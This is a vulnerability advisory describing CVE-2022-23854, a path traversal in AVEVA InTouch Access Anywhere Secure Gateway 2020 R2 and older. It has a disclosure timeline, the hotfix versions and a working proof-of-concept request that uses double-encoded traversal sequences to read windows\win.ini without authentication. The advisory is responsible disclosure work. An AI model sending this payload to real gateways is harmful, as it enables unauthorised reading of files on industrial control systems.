Advisory: AVEVA InTouch Access Anywhere Secure Gateway – Path Traversal

Title: AVEVA InTouch Access Anywhere Secure Gateway – Path Traversal

Author: Jens Regel, CRISEC IT-Security https://crisec.de

Timeline:
25.06.2021 Vulnerability discovered
25.06.2021 Send details to custfirstsupport@aveva.com
21.09.2021 Vendor response, fix is available until Q1/2022
25.09.2021 Vendor released Tech Alert TA000022335
06.09.2022 Public disclosure

CVE: CVE-2022-23854

Vendor:
AVEVA Group plc is a marine and plant engineering IT company headquartered in Cambridge, England. AVEVA software is used in many sectors, including on- and off-shore oil and gas processing, chemicals, pharmaceuticals, nuclear and conventional power generation, nuclear fuel reprocessing, recycling and shipbuilding (https://www.aveva.com).

Affected Products:
InTouch Access Anywhere Secure Gateway versions 2020 R2 and older

Details:
A security vulnerability exists in InTouch Access Anywhere Secure Gateway versions 2020 R2 and older. This is a Relative Path Traversal vulnerability which allows an unauthenticated user with network access to the Secure Gateway to read files on the system outside of the Secure Gateway web server.

Proof of Concept:

GET /AccessAnywhere/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cwindows%255cwin.ini HTTP/1.1

HTTP/1.1 200 OK
Server: EricomSecureGateway/8.4.0.26844.*
(..)

; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1

Fix:
InTouch Access Anywhere Secure Gateway 2020 R2 (version 20.1.0) Hotfix
InTouch Access Anywhere Secure Gateway 2020b (version 20.0.1) Hotfix

/von
Das könnte Dich auch interessieren
Apache Log4j – Lessons Learned?
IT-Sicherheit ist kein Produkt
Advisory: SolarWinds PME Cache Service – Code Execution
Advisory: TANSS 5.8 – Multiple Vulnerabilities (SQLi, XSS)
Advisory: macmon NAC – Directory Traversal